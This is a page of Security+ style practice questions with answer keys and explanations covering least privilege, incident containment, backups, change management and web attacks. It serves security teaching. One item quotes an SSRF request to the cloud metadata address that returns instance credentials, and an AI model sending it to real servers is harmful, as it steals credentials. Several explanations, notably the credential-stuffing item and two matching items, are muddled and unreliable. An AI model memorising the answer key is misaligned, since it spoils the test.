Option A is wrong because blocking all outbound DNS traffic from the server could disrupt legitimate services and does not address the root cause; the attacker may switch to another protocol. Option C is wrong because creating a firewall rule to log further queries only monitors the ongoing exfiltration without stopping it, violating the principle of immediate containment. Option D is wrong because running an antivirus scan is a secondary step that assumes a known malware signature, whereas DNS exfiltration often uses custom scripts or living-off-the-land binaries that may evade signature-based detection.

275
Multi-Selecteasy

Before approving a new payroll SaaS provider, the security team wants independent evidence that the vendor's controls operated effectively during the last year and wants the contract to clearly define security responsibilities. Which two items should they request or review? Select two.

Select 2 answers
A.A SOC 2 Type II report
B.A sales presentation from the vendor account team
C.The vendor's public blog posts
D.Contract clauses covering security responsibilities and incident notification
E.A screenshot of the login page
AnswersA, D

A SOC 2 Type II report provides independent evidence that controls operated effectively over a period of time.

Why this answer

A SOC 2 Type II report provides independent, audited evidence that a vendor's controls (e.g., security, availability, confidentiality) were operating effectively over a specified period (typically 6–12 months). This directly meets the requirement for independent evidence of control effectiveness over the last year, unlike a point-in-time assessment.

Exam trap

The trap here is that candidates often confuse a SOC 2 Type I report (point-in-time design review) with a Type II report (operational effectiveness over time), or they mistakenly believe that marketing materials or user interface screenshots can substitute for independent audit evidence.

276
Multi-Selecthard

A Linux operations team must run a nightly maintenance script on 70 servers to rotate logs and restart one service. Security will not allow interactive SSH logins, and the script should only have the permissions required for those two commands. Which two configuration choices best meet the requirement? Select two.

Select 2 answers
A.Create a dedicated automation account and restrict it in sudoers to the exact commands needed.
B.Place the automation account in the root group so it can restart services everywhere.
C.Use SSH key authentication with a restricted shell or forced command for the automation account.
D.Copy the administrator's personal password into the script so the job can log in unattended.
E.Approve the job through email one time, then allow the script to run with no restrictions forever.
AnswersA, C

A dedicated account makes auditing clear, and sudoers restrictions enforce least privilege for only the approved commands.

Why this answer

Option A is correct because creating a dedicated automation account and restricting it in sudoers to the exact commands needed (e.g., `/usr/sbin/logrotate` and `/usr/bin/systemctl restart <service>`) enforces the principle of least privilege. This ensures the account can only execute the specific maintenance tasks without granting interactive SSH access or unnecessary permissions.

Exam trap

The trap here is that candidates often assume placing an account in a privileged group (like root) is acceptable for automation, but CompTIA tests the principle of least privilege, requiring exact command restriction rather than broad group membership.

277
MCQeasy

Employees use one corporate login to sign in to email, the ticketing portal, and the HR application. After signing in once, the other apps accept the same identity without separate passwords. What capability is this?

A.Single sign-on (SSO)
B.Federation
C.Multi-factor authentication (MFA)
D.Session timeout
AnswerA

SSO lets users authenticate once and access multiple connected applications without repeated logins.

Why this answer

Single sign-on (SSO) allows a user to authenticate once and gain access to multiple applications without re-entering credentials. In this scenario, the corporate login provides a token (e.g., Kerberos ticket or SAML assertion) that is accepted by the email, ticketing portal, and HR application, eliminating the need for separate passwords. This is the core capability of SSO.

Exam trap

CompTIA often tests the distinction between SSO and federation, where candidates mistakenly choose federation because they think 'multiple apps' implies different domains, but the key is that federation involves separate organizations, not just separate applications within the same organization.

How to eliminate wrong answers

Option B (Federation) is wrong because federation extends SSO across different organizations or domains, establishing trust relationships between separate identity providers, whereas the question describes a single corporate login within one organization. Option C (Multi-factor authentication) is wrong because MFA requires two or more verification factors (e.g., password + token), not the ability to reuse a single authentication across multiple apps. Option D (Session timeout) is wrong because session timeout is a security control that automatically ends a user's session after a period of inactivity, not a mechanism for sharing authentication across applications.

278
MCQmedium

A security analyst reviews authentication logs and notices multiple failed login attempts using various usernames from a single IP address over several hours. Eventually, a successful login occurs using a username that had many failed attempts. The organization requires multi-factor authentication (MFA). Which type of attack is most likely indicated by this pattern?

A.Credential stuffing
B.Brute-force attack
C.Password spraying
D.Shoulder surfing
AnswerA

Correct. Credential stuffing leverages lists of known username/password pairs from previous breaches. The analyst observed many failed attempts from one source IP, then a successful login, which matches an attacker testing stolen credentials. Even with MFA, the attack may succeed if the attacker has obtained session tokens or uses other techniques.

Why this answer

The pattern of multiple failed login attempts using various usernames from a single IP address, followed by a successful login for a username that had many failed attempts, is characteristic of a credential stuffing attack. In this attack, the adversary uses a list of previously compromised username/password pairs (often obtained from data breaches) and attempts them against the target system. The successful login indicates that the attacker found a valid credential pair, which bypasses the MFA requirement only if the attacker also has access to the second factor (e.g., via a phishing or session hijacking attack), but the log pattern itself points to credential stuffing.

Exam trap

The trap here is confusing credential stuffing with password spraying: candidates often pick password spraying because it also uses multiple usernames, but the key differentiator is that credential stuffing uses many attempts per username (as seen in the logs), while password spraying uses one common password per username with long delays between attempts.

How to eliminate wrong answers

Option B (Brute-force attack) is wrong because a brute-force attack typically targets a single username with many password guesses, not multiple usernames from a single IP. Option C (Password spraying) is wrong because password spraying uses a single common password against many usernames, not multiple failed attempts per username followed by a success; the pattern here shows many attempts per username, which is the opposite of spraying's low-and-slow approach.

279
Matchingeasy

Match each network segment to the best use in a small enterprise.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Network segment for internet-facing services such as a public web proxy or reverse proxy

Segment for internal systems such as databases that should not be directly reachable from the internet

Restricted network used for switch, firewall, and server administration traffic

Internet-only network for visitors and unmanaged devices

Why these pairings

Each segment serves a specific purpose: guest Wi-Fi for external users, DMZ for public services, internal LAN for daily operations, management for device control, data center for core infrastructure, VPN for secure remote access.

280
MCQmedium

A system administrator must run a weekly maintenance script that stops and restarts two services on 50 Linux servers. Security says the job must not use an interactive login and should have only the permissions needed for that task. What is the best approach?

A.Use the root account for the scheduled job so it always succeeds.
B.Create a dedicated account with sudo rights limited to the required service commands.
C.Ask an administrator to log in manually each week and run the script.
D.Store the administrator password in the script so the task can authenticate automatically.
AnswerB

A restricted service account with narrowly scoped sudo permissions supports automation while limiting exposure if the job is abused.

Why this answer

Option B is correct because it follows the principle of least privilege by creating a dedicated service account with sudo rights restricted to only the specific service management commands (e.g., systemctl restart serviceA.service && systemctl restart serviceB.service). This avoids using the root account (which has unrestricted access) and eliminates the need for interactive logins or embedded credentials, while still allowing the scheduled job (e.g., via cron) to run non-interactively.

Exam trap

The trap here is that candidates may assume root is necessary for service management on Linux, but sudo with carefully scoped commands provides the same functionality without granting full root privileges.

How to eliminate wrong answers

Option A is wrong because using the root account for a scheduled job violates the principle of least privilege and unnecessarily exposes the entire system to potential compromise if the script is tampered with. Option C is wrong because requiring manual interactive login each week defeats automation, introduces human error risk, and does not scale to 50 servers. Option D is wrong because storing the administrator password in the script is a severe security risk (credential exposure) and violates the requirement to avoid interactive login, as the password would be visible in plaintext or easily reversible.

281
MCQmedium

An administrator pushed a firewall rule change to allow a new vendor IP range during business hours. Minutes later, payroll users lost access to an internal service. Which change management practice would have best reduced the impact?

A.Apply changes directly in production so they take effect as quickly as possible.
B.Test the change in a staging environment and include a rollback plan in the request.
C.Avoid documenting the change until after the maintenance window ends.
D.Use verbal approval from the payroll manager instead of the normal ticket process.
AnswerB

This is the best practice because staging validation can reveal unintended access impacts before production is touched. A rollback plan gives operators a fast, documented way to restore service if the change breaks something critical. Together, testing and rollback planning reduce outage duration and support safer operational hardening by making the change controlled, reviewable, and reversible.

Why this answer

Option B is correct because testing the change in a staging environment first would have revealed any unintended side effects, such as ACL conflicts that blocked payroll traffic. Including a rollback plan ensures that if the change causes issues in production, the administrator can quickly revert the firewall rule to restore service. This aligns with the change management process of minimizing impact through controlled testing and contingency planning.

Exam trap

The trap here is that candidates may think speed of implementation (Option A) is more important than safety, but CompTIA emphasizes that change management processes, including testing and rollback, are critical to prevent production outages.

How to eliminate wrong answers

Option A is wrong because applying changes directly in production without prior testing increases the risk of disrupting services, as seen when the new vendor IP range inadvertently blocked payroll users. Option C is wrong because avoiding documentation until after the maintenance window violates change management best practices and makes it difficult to identify or revert the change when an incident occurs. Option D is wrong because using verbal approval bypasses the formal change control process, leaving no audit trail and increasing the chance of unauthorized or uncoordinated changes that can cause outages.

282
MCQmedium

A public web application is seeing bursts of requests that contain SQL metacharacters, encoded script tags, and attempts to POST to administrative endpoints. The team wants a control that can inspect HTTP traffic and block the malicious requests before they reach the app. What should be deployed?

A.A web application firewall in front of the application
B.An endpoint detection and response agent on the web server only
C.A data loss prevention rule on the email gateway
D.A network access control system for user authentication
AnswerA

A WAF is designed to inspect HTTP/S traffic and block common web attacks such as SQL injection and cross-site scripting before they reach the application.

Why this answer

A web application firewall (WAF) is specifically designed to inspect HTTP/HTTPS traffic at the application layer (Layer 7), analyzing request payloads for SQL metacharacters, encoded script tags (XSS), and unauthorized POST attempts to administrative endpoints. By deploying a WAF in front of the web application, malicious traffic is filtered and blocked before it reaches the application server, providing a proactive security control against common web attacks such as SQL injection and cross-site scripting.

Exam trap

The trap here is that candidates may confuse a WAF with a network firewall or an IDS/IPS, but the question specifically mentions HTTP traffic inspection and blocking of application-layer attacks (SQLi, XSS), which is the precise domain of a WAF, not a general network firewall or host-based EDR.

How to eliminate wrong answers

Option B is wrong because an endpoint detection and response (EDR) agent on the web server only monitors and responds to threats at the host level (e.g., file changes, process anomalies) after traffic has already reached the server; it does not inspect or block incoming HTTP requests at the network perimeter. Option C is wrong because a data loss prevention (DLP) rule on the email gateway is designed to monitor and prevent the unauthorized transmission of sensitive data via email, not to inspect or block HTTP traffic targeting a web application.

283
MCQmedium

A help desk ticket reports that a user's Microsoft 365 mailbox sent hundreds of messages to external contacts, and the user says they are still receiving MFA prompts they did not start. The attacker may still have an active web session. What is the best first containment action?

A.Delete the suspicious sent messages and close the ticket.
B.Revoke the account's active sessions and reset the password immediately.
C.Wait until the end of the workday to avoid interrupting the user.
D.Reimage the user's laptop before touching the email account.
AnswerB

Ending active sessions cuts off any stolen cookies or tokens that may still be valid, and resetting the password prevents immediate reentry. In an email compromise, the attacker often keeps access through browser sessions even after credentials change. Fast containment should focus on terminating current access paths first, then investigating forwarding rules, OAuth grants, and sign-in history.

Why this answer

Option B is correct because the user is still receiving unsolicited MFA prompts, indicating an attacker likely has an active web session with a valid token. Revoking all active sessions immediately invalidates any existing tokens or cookies, while resetting the password ensures the attacker cannot re-authenticate. This is the fastest way to cut off the attacker's access and stop further abuse of the mailbox.

Exam trap

The trap here is that candidates may think deleting the sent messages is sufficient containment, failing to recognize that the attacker's active session must be terminated to stop ongoing compromise.

How to eliminate wrong answers

Option A is wrong because deleting the suspicious messages does not remove the attacker's access; they can continue sending more emails, and the root cause (compromised session) remains unaddressed. Option C is wrong because waiting until the end of the workday gives the attacker more time to exfiltrate data, send additional malicious emails, or escalate privileges, violating the principle of immediate containment.

284
Multi-Selecteasy

A branch office has users, finance workstations, and printers on the same LAN. Management wants finance devices isolated from general users while still allowing approved printing and internet access. Which two changes best meet this goal? Select two.

Select 2 answers
A.Put finance systems in a separate VLAN.
B.Use firewall or ACL rules between the VLANs.
C.Remove the default gateway from all finance devices.
D.Place all systems in one flat subnet.
E.Use hubs instead of switches to simplify traffic flow.
AnswersA, B

A separate VLAN creates logical separation between finance devices and general users. This reduces lateral movement and makes it easier to apply different security rules.

Why this answer

Placing finance systems in a separate VLAN (Option A) segments the LAN into isolated broadcast domains, preventing general users from directly accessing finance workstations at Layer 2. This is a foundational step for network segmentation, as VLANs logically separate traffic without requiring physical re-cabling.

Exam trap

The trap here is that candidates often think VLANs alone provide security, forgetting that inter-VLAN routing is enabled by default on most switches, so ACLs or firewall rules are mandatory to actually restrict traffic between VLANs.

285
MCQhard

Based on the exhibit, which change best moves the ERP recovery design toward meeting both recovery targets?

A.Increase the full backup frequency to every night and keep the same recovery process.
B.Add a warm standby database with 15-minute log shipping and scheduled failover tests.
C.Move backup media to the same server to reduce transfer time.
D.Eliminate differential backups and rely only on weekly full backups.
AnswerB

A warm standby reduces recovery time because the system is already provisioned and closer to operational readiness. Pairing it with 15-minute log shipping also improves the recovery point objective by limiting data loss. Scheduled failover tests validate that the process works in practice, which is critical when tight RTO and RPO targets must both be met.

Why this answer

Option B is correct because adding a warm standby database with 15-minute log shipping significantly reduces the recovery point objective (RPO) to near-zero and, combined with scheduled failover tests, ensures the recovery time objective (RTO) is met. This directly addresses the gap between the current backup-only approach and the required recovery targets, as log shipping provides near-continuous data protection and failover testing validates the recovery process.

Exam trap

The trap here is that candidates may think increasing backup frequency (Option A) is sufficient to meet recovery targets, but they overlook that backups alone do not reduce RTO and that a warm standby with log shipping is required for near-zero RPO and fast failover.

How to eliminate wrong answers

Option A is wrong because increasing full backup frequency to every night still leaves up to 24 hours of potential data loss, failing to meet a low RPO requirement, and does not improve recovery time. Option C is wrong because moving backup media to the same server eliminates off-site redundancy, increasing the risk of total data loss in a disaster, and does not reduce transfer time meaningfully if the network is the bottleneck. Option D is wrong because eliminating differential backups and relying only on weekly full backups increases both RPO (up to 7 days) and RTO (longer restore time), moving further from the recovery targets.

286
MCQeasy

A help desk technician receives a call from a user who says many of their documents now have strange file extensions and a ransom note appeared on the desktop. The files will not open. What type of malware is the user most likely experiencing?

A.Spyware that silently records user activity over time
B.Ransomware that encrypts files and demands payment for recovery
C.A worm that spreads mainly by scanning for other hosts
D.A rootkit that hides malicious processes from the operating system
AnswerB

Ransomware commonly encrypts a victim's files and displays a demand for payment to restore access.

Why this answer

The user's symptoms—unopenable files with strange extensions and a ransom note—are classic indicators of ransomware. Ransomware encrypts files using a symmetric key (e.g., AES-256) and then demands payment, typically in cryptocurrency, to provide the decryption key. This matches the scenario exactly, as the files are rendered inaccessible and a note is left behind.

Exam trap

The trap here is that candidates may confuse ransomware with a worm because both can spread rapidly, but the key differentiator is the encryption of files and the presence of a ransom demand, which is unique to ransomware.

How to eliminate wrong answers

Option A is wrong because spyware focuses on covert data collection (e.g., keystroke logging, screen captures) and does not alter file extensions or display ransom notes; it operates silently to avoid detection. Option C is wrong because a worm self-replicates across networks by exploiting vulnerabilities (e.g., SMB EternalBlue) or scanning for open ports, but it does not specifically target user documents with encryption or leave a ransom note on the desktop.

287
MCQmedium

Several employees nearly entered credentials into a fake mailbox login page. The security team wants to reduce repeat mistakes quickly without overwhelming the whole company. What is the best communication approach?

A.Send a short targeted notice to the affected users with examples, warning signs, and reporting steps
B.Wait until the annual security training cycle to address the issue
C.Disable all external email until the next awareness campaign is completed
D.Send a company-wide message naming the affected employees to discourage mistakes
AnswerA

Targeted, timely communication is the best way to improve behavior quickly. A concise alert with screenshots or warning signs helps users recognize the specific threat they encountered, and clear reporting steps make it easier to respond correctly next time. This approach is practical, low disruption, and focused on the people most likely to benefit from immediate coaching.

Why this answer

A short targeted notice to the affected users is the best approach because it directly addresses the immediate threat without overwhelming the entire company. This method allows the security team to quickly reinforce specific warning signs (e.g., mismatched URLs, lack of HTTPS/TLS certificates) and reporting procedures, reducing the likelihood of repeat mistakes while maintaining operational efficiency.

Exam trap

The trap here is that candidates may choose a company-wide message (Option D) thinking it will deter others, but the SY0-701 exam emphasizes privacy and targeted remediation over public shaming or broad disruption.

How to eliminate wrong answers

Option B is wrong because waiting until the annual security training cycle would leave the vulnerability unaddressed for too long, allowing the same phishing attack to succeed repeatedly. Option C is wrong because disabling all external email is an overly drastic measure that would disrupt business operations and is not a targeted communication strategy. Option D is wrong because sending a company-wide message naming the affected employees would violate privacy and potentially cause embarrassment or retaliation, which is counterproductive to security culture and could discourage future reporting.

288
MCQeasy

A SIEM alert shows five failed logins to an administrator account, followed by a successful login from a new city three minutes later. The account owner says they did not sign in. What should the analyst do first?

A.Ignore the alert because the login eventually succeeded.
B.Temporarily disable the account and open an incident for investigation.
C.Reset the password only and close the alert.
D.Reboot the user's laptop to clear any malicious activity.
AnswerB

Disabling the account immediately limits further unauthorized access while the team investigates. Because the user denies the login and the activity is unusual, the account should be contained quickly and the event escalated for incident handling.

Why this answer

Option B is correct because the alert shows a classic indicator of account compromise: multiple failed logins followed by a successful authentication from an unusual location. The account owner's denial of the login confirms unauthorized access, so the immediate priority is to contain the threat by disabling the account and opening an incident for formal investigation. This aligns with the NIST SP 800-61 incident response process, specifically the containment phase before eradication or recovery.

Exam trap

The trap here is that candidates may focus on the 'successful login' as a resolution rather than recognizing it as the point of compromise, leading them to incorrectly choose A or C instead of prioritizing containment.

How to eliminate wrong answers

Option A is wrong because ignoring the alert ignores the clear evidence of a successful brute-force or credential-stuffing attack; the successful login from a new city indicates the attacker gained access, so the alert must be acted upon. Option C is wrong because resetting the password alone does not address the possibility that the attacker established persistence (e.g., a backdoor or session token) or that other accounts are compromised; closing the alert without investigation violates standard incident response procedures. Option D is wrong because rebooting the user's laptop does not remediate a server-side or cloud-based account compromise; the attacker likely authenticated from a remote system, not the local device, and rebooting would not remove any malicious activity on the server or directory service.

289
Multi-Selecthard

A privileged cloud administrator account shows two suspicious events: an API key was created from an unfamiliar IP address, and a mailbox forwarding rule was added five minutes later. The account is still active and may be in attacker control. Which two actions should the analyst take first to preserve evidence while limiting additional abuse? Select two.

Select 2 answers
A.Export the relevant identity and audit logs before making changes, so the original event trail is preserved.
B.Revoke the suspicious API key or active session token, so the attacker loses immediate access.
C.Delete the mailbox forwarding rule and empty the trash folder, so the attacker cannot read old messages.
D.Reimage the admin workstation immediately, because the issue must have started on the endpoint.
E.Disable all company email for every user until the account investigation is finished.
AnswersA, B

Preserving the logs first protects the original evidence before any containment actions change the environment. Identity, audit, and mailbox logs can later prove who created the key, when the forwarding rule was added, and from where the activity originated. Exporting them early reduces the chance that the response itself destroys useful evidence.

Why this answer

Option A is correct because exporting identity and audit logs before any changes preserves the original event trail, which is critical for forensic analysis and chain of custody. If logs are altered or rotated after the fact, evidence of the attacker's actions (e.g., API key creation from an unfamiliar IP) could be lost or overwritten, hindering the investigation.

Exam trap

The trap here is that candidates may prioritize immediate disruption (e.g., deleting the forwarding rule or disabling email) over evidence preservation, forgetting that logs are the primary source of truth for incident response and that revoking access tokens (Option B) is the correct way to stop abuse without destroying evidence.

290
MCQmedium

A help desk team needs sample customer tickets in a lower environment for testing. The records contain names, phone numbers, and case details. Which approach best reduces privacy risk while still allowing useful testing?

A.Copy the production database exactly into the test system
B.Mask or tokenize the personal data before loading it into test
C.Email the records to developers so they can import them manually
D.Store the records in an unencrypted spreadsheet on a shared drive
AnswerB

Masking or tokenizing preserves usefulness for testing while reducing exposure of real personal information.

Why this answer

Option B is correct because data masking or tokenization replaces sensitive personal information (names, phone numbers) with realistic but fictitious values, preserving the dataset's utility for testing while minimizing exposure of real PII. This approach aligns with privacy best practices and regulatory requirements like GDPR or HIPAA, as the test environment never contains actual customer data.

Exam trap

The trap here is that candidates may choose Option A (exact copy) thinking it is the most efficient for testing, overlooking that privacy risk in a lower environment is a critical security concern that must be mitigated even at the cost of convenience.

How to eliminate wrong answers

Option A is wrong because copying the production database exactly into the test system exposes real PII (names, phone numbers, case details) in a lower environment that may lack production-level access controls, increasing the risk of data breach or non-compliance. Option C is wrong because emailing records containing PII to developers violates data protection principles (e.g., transmitting sensitive data over unencrypted channels) and introduces unnecessary distribution of personal data. Option D is wrong because storing records in an unencrypted spreadsheet on a shared drive provides no access control or encryption, leaving PII vulnerable to unauthorized access, theft, or accidental exposure.

291
MCQmedium

A security analyst receives an alert about a user account that has been attempting to authenticate from an unusual geographic location outside of business hours. The analyst reviews the event logs and sees that the authentication attempt was successful, but the user has not reported any suspicious activity. Which of the following actions should the analyst take NEXT?

A.Disable the user account immediately to prevent further access
B.Contact the user to verify whether the authentication was legitimate
C.Continuously monitor the account for additional suspicious activity
D.Revoke all active sessions for the user account
AnswerB

Contacting the user is the appropriate next step in the incident response process. The analyst needs to confirm if the user performed the action. If the user denies it, the account is likely compromised, and the incident should be escalated. This step helps avoid false positives and ensures accurate incident handling.

Why this answer

The correct next step is to contact the user to verify whether the authentication was legitimate. Since the authentication was successful and the user has not reported suspicious activity, the analyst must first gather context from the user before taking any disruptive action. This aligns with the incident response process of validation and scoping before containment.

Exam trap

The trap here is that candidates often jump to containment (disabling the account) without first validating the alert, confusing the 'detection and analysis' phase with the 'containment, eradication, and recovery' phase of the incident response process.

How to eliminate wrong answers

Option A is wrong because immediately disabling the user account without verification could disrupt legitimate access and is premature; the analyst should first confirm the activity is unauthorized. Option C is wrong because continuous monitoring alone delays necessary action and does not address the immediate need to determine if the account is compromised; passive monitoring is insufficient when a successful authentication from an unusual location has already occurred.

292
MCQhard

Based on the exhibit, which additional control is the best fit to prevent employees from copying sensitive reports to removable media?

A.Block all internet access on finance laptops except for the accounting website.
B.Implement endpoint device control or DLP rules to restrict removable media use.
C.Increase the password complexity requirements for finance users.
D.Add more antivirus signatures to the endpoint protection platform.
AnswerB

This is the best control because the incident involves data being copied to USB devices. Awareness and encryption do not stop a user from transferring files to removable media. Endpoint device control or DLP can block, log, or limit USB storage use, directly reducing the exfiltration path while preserving normal internet and email access.

Why this answer

Endpoint device control or DLP (Data Loss Prevention) rules are specifically designed to monitor, block, or restrict the use of removable media such as USB drives. By implementing such controls, an organization can enforce policies that prevent sensitive data from being copied to unauthorized external storage devices, directly addressing the threat of data exfiltration via removable media.

Exam trap

The trap here is that candidates often confuse network-based controls (like web filtering) with physical data exfiltration controls, or they mistakenly believe that stronger authentication or antivirus updates can prevent intentional data copying to removable media.

How to eliminate wrong answers

Option A is wrong because blocking all internet access except for the accounting website does not prevent copying data to removable media; it only restricts network-based data exfiltration, leaving the physical USB vector unaddressed. Option C is wrong because increasing password complexity requirements only strengthens authentication, but does not control what users do with data after they are authenticated, so it has no effect on copying files to removable media. Option D is wrong because adding more antivirus signatures improves detection of known malware but does not enforce policies on data transfer to removable media; it is a reactive security measure, not a preventive control for data loss.

293
Matchingeasy

Match each security principle to the best workplace example.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

A help desk technician can reset passwords but cannot open payroll records.

A customer portal uses MFA, endpoint protection, and network filtering together.

The system rechecks trust before each sensitive action, even from a managed device.

One employee creates a payment batch and a different employee approves it.

An analyst sees only the case files assigned to that investigation.

Why these pairings

Each workplace example illustrates a security principle: least privilege grants minimal access, separation of duties divides tasks, defense in depth uses multiple controls, fail safe defaults to safe state, need to know restricts data access, and accountability tracks user actions.

294
MCQmedium

A cloud-hosted image-processing API accepts a URL parameter so it can download a picture and generate a thumbnail. Logs show a user submitting `http://169.254.169.254/latest/meta-data/` and receiving instance credentials in the response. Which attack is being used?

A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB

SSRF tricks the server into making an internal request to a sensitive resource on the attacker’s behalf.

Why this answer

The attack is Server-Side Request Forgery (SSRF) because the cloud-hosted API is tricked into making a request to the internal metadata service at the link-local address 169.254.169.254. This endpoint is only accessible from within the cloud provider's network and exposes instance credentials, which the attacker then receives in the response. SSRF exploits the server's ability to make outbound requests to internal or restricted resources.

Exam trap

The trap here is that candidates may confuse SSRF with CSRF because both involve 'forgery' and server requests, but SSRF originates from the server itself, while CSRF originates from a user's browser under the attacker's control.

How to eliminate wrong answers

Option A is wrong because Cross-Site Scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not manipulating server-side requests to internal IPs. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into performing unintended actions on a trusted site, not exploiting a server to fetch internal resources. Option D is wrong because SQL injection targets database queries through input fields, not HTTP requests to cloud metadata endpoints.

295
MCQmedium

An investigator has just created a bit-for-bit image of a suspect's SSD using a write blocker. Before the drive is returned to evidence storage, what action most directly validates the integrity of both the original media and the image?

A.Defragment the original SSD to make later analysis faster.
B.Calculate cryptographic hashes of the source and the image and record them.
C.Compress the image file to reduce storage usage before documentation.
D.Wipe free space on the original SSD to remove deleted remnants.
AnswerB

Matching hashes provide a repeatable integrity check that shows the image accurately reflects the acquired source without alteration.

Why this answer

Option B is correct because cryptographic hashing (e.g., SHA-256 or MD5) generates a unique digital fingerprint of the original SSD and the forensic image. By comparing the hash values, the investigator can verify that the bit-for-bit copy is identical to the source, ensuring data integrity and admissibility in legal proceedings. This step directly validates that no data has been altered or omitted during acquisition.

Exam trap

The trap here is that candidates may confuse integrity validation with storage optimization or cleanup tasks, mistakenly thinking defragmentation or compression helps preserve evidence, when in fact they destroy the forensic integrity that hashing alone guarantees.

How to eliminate wrong answers

Option A is wrong because defragmenting an SSD alters the physical layout of data, which destroys the original evidence and violates forensic best practices; it also does not validate integrity. Option C is wrong because compressing the image file changes its binary representation, breaking the hash match with the original media and potentially corrupting evidence. Option D is wrong because wiping free space modifies the original drive, destroying potential evidence remnants and invalidating any integrity verification.

296
Multi-Selecthard

After a ransomware incident, management sees that last night's backups completed successfully and wants proof they can actually be used before production is declared recovered. Which three actions best validate recoverability? Select three.

Select 3 answers
A.Restore a representative backup into an isolated test environment.
B.Run application and data validation checks on the restored system.
C.Measure the restore duration against the documented recovery objectives.
D.Increase the retention period without performing any restore.
E.Close the incident because the backup software reported a successful job completion.
AnswersA, B, C

A real restore test shows whether the backup can be recovered without risking production data.

Why this answer

Option A is correct because restoring a representative backup into an isolated test environment directly validates that the backup data is readable, the restore process works, and the system can be brought online without impacting production. This is the only way to confirm the backup is not corrupt or incomplete, as backup software success logs alone are insufficient.

Exam trap

The trap here is that candidates assume a successful backup job log is sufficient proof of recoverability, but CompTIA emphasizes that only a verified restore in a test environment can confirm the backup is usable, as backup software does not validate the restore process or data integrity.

297
Multi-Selecthard

A cloud backup service uses envelope encryption. The key-encryption key is nearing the end of its approved lifetime, but the business cannot decrypt and re-encrypt every backup object this week. Which two statements best describe the correct rotation approach? Select two.

Select 2 answers
A.Generate a new key-encryption key and use it for future backups.
B.Rewrap the existing data-encryption keys with the new key-encryption key.
C.Decrypt and re-encrypt every backup object immediately with a new data key.
D.Destroy the old key before the rewrapping process finishes.
E.Replace the hashing algorithm used for file integrity checks.
AnswersA, B

A new wrapping key can be introduced without changing the underlying encrypted backup data immediately.

Why this answer

Option A is correct because envelope encryption allows the key-encryption key (KEK) to be rotated without touching the underlying data. Generating a new KEK and using it for future backups ensures that new data-encryption keys (DEKs) are wrapped with the fresh KEK, maintaining security without requiring immediate decryption and re-encryption of all existing backup objects.

Exam trap

The trap here is that candidates often assume key rotation requires re-encrypting all data, missing the core advantage of envelope encryption where only the key-encryption key needs to be rotated and DEKs can be rewrapped independently.

298
Multi-Selecteasy

After a phishing simulation, many users still nearly entered credentials. Leadership wants to reduce repeat mistakes without causing long training sessions. Which two actions are the best balance of security and usability? Select two.

Select 2 answers
A.Send a short targeted refresher focused on the exact mistake
B.Add an easy reporting button inside the email client
C.Require every employee to attend a full-day annual course this week
D.Publicly post the names of employees who clicked the simulation
E.Disable all email attachments for every user
AnswersA, B

A brief, focused reminder addresses the observed behavior without taking people away from their normal work for long periods.

Why this answer

Option A is correct because a short, targeted refresher directly addresses the specific mistake (e.g., entering credentials on a phishing page) without overwhelming users. This approach leverages microlearning principles, which improve retention and reduce cognitive load compared to lengthy training. It balances security by reinforcing the exact behavior to avoid, while maintaining usability by minimizing time away from work.

Exam trap

The trap here is that candidates may choose C (full-day course) thinking it is thorough, but CompTIA emphasizes that security awareness must be continuous, short, and relevant, not a one-time marathon that sacrifices usability for perceived completeness.

299
MCQmedium

An operations manager is worried a single network administrator could quietly push an unauthorized firewall rule. The manager wants every rule change reviewed by a second person and documented before implementation. Which control best addresses this concern?

A.Enable detailed firewall logging so each packet match is written to disk.
B.Require a documented change-management workflow with two approvers before any firewall rule is applied.
C.Move the firewall appliance into a locked equipment rack.
D.Encrypt the firewall configuration backup with a strong key.
AnswerB

Correct. A documented change-management process with dual approval is an administrative control that reduces insider risk and improves accountability. It creates separation of duties, adds review before implementation, and leaves an auditable trail. That combination directly addresses the manager's concern about a single administrator making hidden changes.

Why this answer

Option B is correct because a documented change-management workflow with two approvers directly enforces separation of duties, ensuring that no single administrator can implement a firewall rule change without peer review and documented approval. This control addresses the manager's concern about unauthorized changes by requiring a second person to review and approve before the rule is applied, which is a fundamental principle of access control and change management.

Exam trap

The trap here is that candidates may confuse detective controls (like logging) or physical controls (like locked racks) with preventive administrative controls, failing to recognize that only a documented approval workflow with two approvers directly enforces the required separation of duties to prevent unauthorized rule changes.

How to eliminate wrong answers

Option A is wrong because enabling detailed firewall logging records traffic matches after the fact, but it does not prevent a single administrator from pushing an unauthorized rule; it only provides forensic evidence. Option C is wrong because moving the firewall into a locked equipment rack provides physical security against tampering with the hardware, but it does not prevent a network administrator from remotely pushing unauthorized rule changes via the management interface. Option D is wrong because encrypting the firewall configuration backup protects the backup file from unauthorized access, but it does not control or review live rule changes made by an administrator.

300
MCQmedium

A developer finds a production bug on Friday afternoon. The fix has already passed staging, but the business wants the release to be reversible if the hotfix causes trouble. Which change-management practice best satisfies both speed and control?

A.Bypass change control so the patch reaches production immediately
B.Wait for the next normal change window next week
C.Use an emergency change with a documented rollback plan and approval
D.Freeze all production changes until the next monthly review meeting
AnswerC

An emergency change supports urgent deployment while preserving control through approval, testing evidence, and rollback steps.

Why this answer

Option C is correct because an emergency change with a documented rollback plan and approval provides the fastest path to production while maintaining control. This practice aligns with ITIL's emergency change advisory board (ECAB) process, which allows expedited approval for critical fixes while requiring a tested rollback procedure to ensure reversibility. The business's requirement for speed is met by bypassing the normal change window, and control is preserved through mandatory documentation and approval.

Exam trap

The trap here is that candidates may assume 'speed' means 'no process at all' (Option A), but CompTIA tests the understanding that emergency change procedures are designed to balance speed with control, not eliminate it.

How to eliminate wrong answers

Option A is wrong because bypassing change control entirely violates security governance and could lead to unauthorized changes, configuration drift, and audit failures; it sacrifices all control for speed. Option B is wrong because waiting for the next normal change window (e.g., a weekly maintenance window) fails to meet the business's need for speed, as the bug is in production and causing issues now. Option D is wrong because freezing all production changes until the next monthly review meeting is overly restrictive, preventing even this critical hotfix from being deployed, and does not address the need for a reversible release.

Page 3

Page 4 of 16

Page 5